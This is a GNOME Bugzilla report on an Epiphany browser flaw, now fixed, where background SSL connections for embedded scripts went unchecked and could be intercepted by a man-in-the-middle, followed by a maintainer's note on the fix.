GNOME Bugzilla – Bug 639764
MITM attacker can intercept background SSL connections without warning
Last modified: 2014-08-08 14:44:41 UTC
Epiphany is willing to connect to an SSL server regardless of the certificate. The lock in the URL bar indicates whether the main HTML page was received via a connection with a good certificate. This is argued to be insufficient warning (bug 542454). But quite apart from that, the certificate status of connections other than the one used to retrieve the main HTML page is not indicated at all. A MITM attacker can intercept these "background" connections and respond with malicious data while the lock in the URL bar remains unbroken. In my testing, when Epiphany loads a page with multiple embedded items, it opens one or more background connections in addition to the main connection and retrieves the items in parallel across all the connections. Thus, Epiphany's SSL implementation provides no security against a MITM attacker on a modern web site with multiple <script src> tags, such as this bug tracker, since the attacker can substitute arbitrary script that will run in the site's security origin. For steps to reproduce, see https://bugzilla.redhat.com/show_bug.cgi?id=643224 .
Priority: immediate; "is a security issue in a released version of the software."
Thanks for the simple test case. This is fixed by attachment #280439 [details] in bug #708847 (though the commit message does not indicate this) which causes background connections that fail to be silently dropped. (I've verified that this is the same behavior as Firefox, so I think that's sufficient.)
Matt, sorry this serious bug went unresolved for so long. It should be fixed in our upcoming 3.14 release.